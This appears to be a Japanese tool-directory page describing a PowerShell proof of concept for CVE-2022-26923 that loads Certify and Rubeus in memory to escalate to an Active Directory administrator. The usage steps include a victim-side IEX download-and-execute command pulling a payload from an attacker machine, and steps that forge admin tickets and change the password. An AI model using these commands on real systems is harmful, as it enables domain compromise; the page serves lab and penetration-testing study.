Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-26923-Powershell-POC — メモリからCertifyとRubeusを読み込んで自動的に実行するPowerShellのPoC。 | Kitploit
ツール/GitHubGitHub/lsecqt/cve-2022-26923-powershell-poc
特権昇格脆弱性分析エクスプロイトペネトレーションテスト学習と教育ラボと実践
GitHublsecqt/cve-2022-26923-powershell-poc

CVE-2022-26923-Powershell-POC

メモリからCertifyとRubeusを読み込んで自動的に実行するPowerShellのPoC。

リポジトリを見る
1784年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-26923-Powershell-POC

Certify と Rubeus をメモリ上に読み込み、自動的に実行するための PowerShell POC です。

仕組み

  1. Certify.exe と Rubeus.exe をメモリに読み込みます。
  2. ターゲットマシン上で誤って構成された証明書テンプレートをスキャンします。(詳細: https://www.youtube.com/watch?v=HBRCI5O35R8)
  3. 脆弱なテンプレートに基づいて、Administrative ユーザーの証明書を要求します。
  4. 証明書を証明書ハンドラーに送信し、.pfx 形式に変換してクライアントに送り返します。
  5. Rubeus を使用して証明書を読み込み、Administrative ユーザーのチケットを生成します。
  6. Administrative ユーザーのパスワードを変更します。(デモのためだけです)

この POC は以下の TryHackMe ラボでテストされています: https://tryhackme.com/room/adcertificatetemplates

この CVE は権限昇格に使用されるため、このデモや THM ラボでは初期侵害は対象としていません。

手順:

  1. python3 -m http.server 80 [攻撃者マシン]
  2. python3 uploader.py 8000 [攻撃者マシン]
  3. IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [被害者マシン]

注: この POC は教育目的です。ご自身の行動に対する責任はあなたにあります。

ツールをダウンロード